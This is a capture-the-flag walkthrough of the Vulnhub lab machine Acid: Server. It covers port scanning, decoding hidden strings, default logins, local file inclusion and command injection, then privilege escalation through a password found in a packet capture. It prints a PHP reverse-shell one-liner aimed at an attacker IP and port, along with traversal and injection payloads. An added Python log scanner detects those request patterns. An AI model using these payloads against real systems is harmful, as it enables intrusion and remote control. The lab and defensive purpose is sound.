CTF Walkthrough – Acid: Server (Vulnhub)


Acid: Server is the first machine that I took from vulnhub, and it was quite interesting to crack. It is the first machine in the Acid series. The difficulty, though not stated by the author Avinash Kumar Thapa, is just above easy.
You can download the machine from here: https://www.vulnhub.com/entry/acid-server,125/

The Goal – Escalate the privileges to root and capture the flag.

Let's get started:
After booting the Acid Server VM, we first need to identify the target machine. Use netdiscover to find the IP address of the Acid server.

01 target search - netdiscover

Now we run nmap on the target to find more about the server.

02 nmap scan

Only port 33447, running an httpd service, was found open. Open a browser and enter the address 192.168.9.129:33447. This gives us the welcome page.

03 welcome page

The page itself had nothing of interest, but notice its title: it says /Challenge. That is a directory, so append it to the URL to access it.

04 Challenge page

We get a login page. Before trying injection here, let's check the source code for any info (like a commented-out username and password).

05 login source code

Here we see an unusual random string in the DOCTYPE declaration. The page also uses some kind of JavaScript library for its login form.

Going with the random string first: applying rot13 and reversing the string gives acid.txt. Opening that file, we find /protected_page.php written in it.

06 acidtxt

Opening protected_page.php lands us at a dead end. It says that we are not authorized to access this page.

07 protected_page

To log in, we now turn to the JavaScript library to find out what mechanism it uses for authentication. The script file forms.js carries a copyright notice for peredur.net.
A little searching on Google gave us the default credentials for that setup. Refer to this link: https://github.com/peredurabefrog/phpSecureLogin/blob/master/README.md

Username: test_user
Email: test@example.com
Password: 6ZaxN2Vzm9NUJT2y

Trying the above credentials authenticated us successfully, and we land on the same protected_page.php, but this time with a better message.

08 login

09 admin success

The admin panel has a link that says "Click Here to Proceed Further". Go ahead and click that link. The next page is include.php, which is vulnerable to LFI (local file inclusion).

10 includephp

The content of the requested file is not visible on the rendered page, but it is in the page source.

11 LFI result

The page source also has a commented-out hexadecimal string at the bottom.

Converting it to ASCII gives Y3VjLnJ4bnA=, which is then base64-decoded to retrieve cuc.rxnp. Performing rot13 and reversing it, we get cake.php.

12 cakephp

The cake.php page gives us another directory, /Magic_Box, in its title. Accessing this directory, we get a nice 403 Forbidden error.

Time to use dirbuster to find out more about this directory.

13 dirb Magic_Box

Running dirbuster on /Challenge/Magic_Box gives us a few files in it. The one that turned out to be helpful was command.php.

14 dirb Magic_Box result

The page command.php provides functionality to ping a host and is vulnerable to OS command injection. Did the page title say reverse? So without any delay, start a listener on the attacking machine and enter the following command in the page to get a shell.

; php -r '$sock=fsockopen("192.168.9.128",4444);exec("/bin/bash -i <&3 >&3 2>&3");'

Replace the IP address and listener port with yours.
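From the defender's side, as an added example that is not part of the original walkthrough: a small Python scanner that flags the two request patterns exploited above (directory traversal against include.php and shell metacharacters in the command.php ping parameter) in Apache-style access logs. The log lines, timestamps and the parameter names "file" and "ip" are constructed for the demonstration, not taken from the box.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache-style access log lines modelled on the requests made in this
# walkthrough; the parameter names "file" and "ip" are assumptions, not taken from the box.
SAMPLE_LOG = """\
192.168.9.128 - - [10/Aug/2015:10:00:01 +0000] "GET /Challenge/ HTTP/1.1" 200 1532
192.168.9.128 - - [10/Aug/2015:10:00:07 +0000] "GET /Challenge/include.php?file=../../../../etc/passwd HTTP/1.1" 200 2401
192.168.9.128 - - [10/Aug/2015:10:00:09 +0000] "GET /Challenge/include.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2401
192.168.9.128 - - [10/Aug/2015:10:00:15 +0000] "GET /Challenge/Magic_Box/command.php?ip=127.0.0.1%3Bid HTTP/1.1" 200 88
192.168.9.128 - - [10/Aug/2015:10:00:20 +0000] "GET /Challenge/Magic_Box/command.php?ip=127.0.0.1 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Traversal sequences and stream wrappers that point at local file inclusion.
LFI_RE = re.compile(r'\.\./|\.\.\\|^/etc/|^php://|^file://', re.IGNORECASE)
# Shell metacharacters that have no place in a hostname or IP address.
CMDI_RE = re.compile(r'[;|&`\n]|\$\(')


def classify_request(target: str) -> list:
    """Return (kind, param, decoded_value) findings for one request target."""
    findings = []
    # parse_qsl already URL-decodes once; unquote again so double-encoded
    # traversal (%252e%252e%252f) is inspected in its final form.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)
        if LFI_RE.search(decoded):
            findings.append(("LFI", name, decoded))
        if CMDI_RE.search(decoded):
            findings.append(("CMDI", name, decoded))
    return findings


def scan_log(text: str) -> list:
    """Run the classifier over every parseable log line; return alert dicts."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for kind, param, value in classify_request(m["target"]):
            alerts.append({"src": m["src"], "kind": kind, "param": param,
                           "value": value, "path": urlsplit(m["target"]).path})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The double unquote is the part worth copying into a real rule: the single-decoded form of the third line still hides the traversal behind %2e sequences.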

17 php reverse shell cmd

18 got shell

We get a shell as the www-data user. This is a non-interactive shell, and we need an interactive one: without a TTY, the OS cannot prompt for a password and su won't work. I created a small Python script with the following code and executed it.

import pty; pty.spawn("/bin/bash")

Executing it gives you an interactive shell. Run the su command to check that it is now interactive.

19 take interactive shell

Start checking for files on the system. We found an unusual directory, s.bin, in the system root. It contains a file investigate.php whose content asks us to behave like an investigator and catch the culprit.

20 unusual sbin

Next, look at the home directories of local users. Access to root's home directory was denied. The home directory of user 'acid' has a hidden, 0-byte file named .sudo_as_admin_successful. This could be a hint that local users are also sudoers and can switch to admin.

21 home of acid

Now we need to escalate to a local user. Looking further into the filesystem, we found a directory raw_vs_isi inside /sbin. It contains a pcap file, hint.pcapng.

Analysing the 6000+ packets in the file, we found something about a 'culprit'.

Saman is the culprit and he known by name 1337hax0r

So, trying '1337hax0r' as the password for the user 'saman', we get access to this user. And following the earlier hint (sudo as admin successful), we simply run 'sudo su' and get root, with a Congratulations banner.

23 su to saman

We still have to find the flag. Start with root's home directory. It contains only one file, flag.txt. Open it and we get a message that we have successfully completed the challenge.

24 flag

Note: There are multiple ways to complete this challenge, right from the first web page. Readers are encouraged to try capturing the flag in other ways.
